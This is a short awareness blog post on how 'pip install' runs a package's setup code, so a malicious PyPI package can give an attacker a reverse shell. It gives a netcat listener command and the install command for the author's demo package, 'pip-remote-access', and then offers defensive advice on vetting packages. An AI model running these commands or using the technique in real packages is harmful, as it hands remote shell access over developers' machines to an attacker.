RCE with pip ? Yes you read it right.
First before getting our hands dirty, lets see what is pip
Most Python developers would obviously knows what is pip.
For other developers, pip is the package installer for Python. You can use pip to install packages from the Python Package Index and other indexes. It is npm, apt, homebrew (Some other package manager you name it) for python.
Let's assume you wanna send http request from python well you could use famous package name requests
To get requests package on your computer, you will using the command :
pip install requests That's it.
This will install the package and you can use the package can be used by importing the package.
So how the pip install works, Simple it gets the source code from the server and execute the script in your computer and install the requirements, this is how pip install works.
That's what I did, I wrote a package which allows the attacker to get the reverse shell of the victim.
I didn't want to make a global reverse shell thing, so i simply wrote the script to be executed on locally on the machine.
- First listen on 1234 port with nc
nc -lvp 1234
- Now install the package
pip install pip-remote-access
Now the listener will get the reverse shell.
This module is to show and create a awareness among developers, So when installing package verify that it is legal verified publisher.
PyPi.org doesn't checks the github page whether it was the appropriate right developer, It just get whatever github the developer gives and displays the stars and forks from it.
So better get into the github page of the package and check the page, this way you also get to know the code.
Install the package with binary only mode it will be much more safe.